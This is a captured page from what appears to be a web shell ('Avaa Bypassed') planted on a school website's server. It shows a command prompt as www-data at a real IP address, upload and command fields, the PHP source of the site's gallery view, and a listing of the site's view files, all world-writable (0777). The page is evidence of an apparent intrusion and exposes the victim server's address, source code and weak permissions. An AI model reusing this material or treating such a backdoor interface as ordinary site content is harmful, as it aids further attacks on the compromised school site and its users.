[ Avaa Bypassed ]




Upload:

Command:

www-data@18.216.67.249: ~ $
<div class="page-header-area">
    <div class="container">
        <div class="page-header-content">
            <h2 class="title"><span class="inner"><?php echo $this->lang->line('gallery'); ?></span></h2>
            <ul class="links">
                <li><a href="<?php echo site_url($school->school_url); ?>"><?php echo $this->lang->line('home'); ?></a></li>
                <li><a href="javascript:void(0);"><?php echo $this->lang->line('gallery'); ?></a></li>
            </ul>
        </div>
    </div>
</div>

<div class="page-gallery-area">    
    <div class="container">
        
    <?php if(isset($galleries) && !empty($galleries)){ ?>
        
        <div class="gallery-menu">
            <button class="button checked" data-filter="*">All</button>
            <?php foreach($galleries AS $obj){ ?>
                <button class="button" data-filter=".<?php echo $obj->id; ?>Gallery"><?php echo $obj->title; ?></button>                
            <?php } ?>
        </div>
        
        <div class="row no-gutters justify-content-center grid_container" id="container">
             <?php foreach($galleries AS $obj){ ?>
                <?php $images = get_gallery_images($obj->school_id, $obj->id); ?> 
                <?php foreach($images as $img){ ?>
                    <div class="col-lg-3 col-md-4 col-sm-6 col-12 gallery-box grid <?php echo $obj->id; ?>Gallery" data-category="post-transition">
                        <div class="single-gallery">
                            <a href="#" class="link" target="_blank" style="display:none;"><i class="fas fa-link"></i></a>
                            <a href="<?php echo UPLOAD_PATH; ?>gallery/<?php echo $img->image; ?>" class="fancy" data-fancybox="images">
                                <i class="fas fa-expand-arrows-alt"></i>
                                <img src="<?php echo UPLOAD_PATH; ?>gallery/<?php echo $img->image; ?>" alt="">
                            </a>
                        </div>
                    </div>           
                <?php } ?>
            <?php } ?>
        </div>
        
         <?php }else{ ?>
            <div class="col-lg-12 col-md-12 col-sm-12 col-12">
                <p class="text-center"><strong><?php echo $this->lang->line('no_data_found'); ?></strong></p>
            </div>
        <?php } ?>
        
    </div>
</div>

Filemanager

Name Type Size Permission Actions
layout Folder 0777
about.php File 2.93 KB 0777
academic_calender.php File 3.57 KB 0777
active_teacher.php File 4.85 KB 0777
admission-form.php File 20.41 KB 0777
admission-online.php File 43.93 KB 0777
apa.php File 19.75 KB 0777
class_routine.php File 3.64 KB 0777
contact.php File 7.81 KB 0777
event.php File 3.07 KB 0777
event_detail.php File 4.93 KB 0777
faq.php File 1.84 KB 0777
gallery.php File 2.3 KB 0777
head_message.php File 7.97 KB 0777
head_served.php File 2.4 KB 0777
holiday.php File 2.72 KB 0777
holiday_detail.php File 3.78 KB 0777
inactive_teacher.php File 4.85 KB 0777
index.php File 20.92 KB 0777
leave_teacher.php File 4.85 KB 0777
news.php File 2.83 KB 0777
news_detail.php File 4.64 KB 0777
notice.php File 2.63 KB 0777
notice_detail.php File 4.06 KB 0777
other_resources.php File 3.59 KB 0777
page.php File 2.18 KB 0777
profile_detail.php File 25.44 KB 0777
publication.php File 1.88 KB 0777
splash.php File 25.63 KB 0777
staff.php File 4.5 KB 0777
student_notices.php File 4.94 KB 0777
students.php File 5.51 KB 0777
students_form_resources.php File 3.53 KB 0777
teacher.php File 5.79 KB 0777
workshop.php File 2.84 KB 0777
workshop_detail.php File 4.65 KB 0777